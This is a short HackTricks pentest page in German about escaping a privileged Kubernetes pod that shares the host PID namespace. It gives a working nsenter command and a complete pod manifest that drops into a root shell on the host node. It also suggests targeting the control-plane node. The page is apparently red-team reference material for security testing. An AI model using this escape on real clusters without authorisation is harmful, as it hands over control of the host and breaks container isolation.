Pod Escape Privileges

Lernen Sie AWS-Hacking von Grund auf mit htARTE (HackTricks AWS Red Team Expert)!

Andere Möglichkeiten, HackTricks zu unterstützen:

Privileged and hostPID

Mit diesen Berechtigungen haben Sie Zugriff auf die Prozesse des Hosts und ausreichende Berechtigungen, um in den Namespace eines der Host-Prozesse einzutreten. Beachten Sie, dass Sie möglicherweise nicht unbedingt privilegiert sein müssen, sondern nur einige Fähigkeiten und andere potenzielle Abwehrmechanismen umgehen müssen (wie AppArmor und/oder Seccomp).

Das Ausführen von etwas Ähnlichem wie dem Folgenden ermöglicht es Ihnen, aus dem Pod auszubrechen:

nsenter --target 1 --mount --uts --ipc --net --pid -- bash

Konfigurationsbeispiel:

apiVersion: v1
kind: Pod
metadata:
name: priv-and-hostpid-exec-pod
labels:
app: pentest
spec:
hostPID: true
containers:
- name: priv-and-hostpid-pod
image: ubuntu
tty: true
securityContext:
privileged: true
command: [ "nsenter", "--target", "1", "--mount", "--uts", "--ipc", "--net", "--pid", "--", "bash" ]
#nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name
Erlernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)!

Andere Möglichkeiten, HackTricks zu unterstützen:

Last updated